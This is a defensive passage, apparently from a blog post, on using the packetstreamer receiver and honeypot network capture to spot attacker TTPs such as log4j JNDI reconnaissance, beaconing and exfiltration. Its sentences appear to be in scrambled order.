The receiver server writes the aggregated capture traffic to a log file, such as /tmp/dump_file.
Our receiver server is located behind the firewall, listening on port 8081 for traffic from the honeypot sensors: packetstreamer receiver -config contrib/config/receiver.yaml The first signal you get from on-workload telemetry may be the installation of an exploit kit (a crypto-miner for example).
The initial JNDI recon against multiple workloads, the JNDI request that then triggers an outgoing request (beacon) to an attacker’s listener, the subsequent request that retrieves the Java class to be run… all of these are network activities and cannot be identified by on-workload sensors. Observing traffic can also reveal lateral spread and exfiltration activities.įor example, in a log4j exploit, almost all of the initial signals are network-based. Observing network traffic can reveal attacker behaviors before a successful compromise, such as reconnaissance activity and weaponization that is targeted at specific vulnerabilities.
Organizations need to see a bigger context, and that’s where network capture and analysis comes into play. Tools such as Sysdig Falco capture TTP signals from running workloads (process changes, filesystem access, etc.), and can give indications of local compromise, but these signals alone only tell the late-stage story of an attack event. One foundation of a good cybersecurity practice is the ability to capture attack actor TTPs (Tactics, Techniques, and Procedures) from across and behind the attack surface.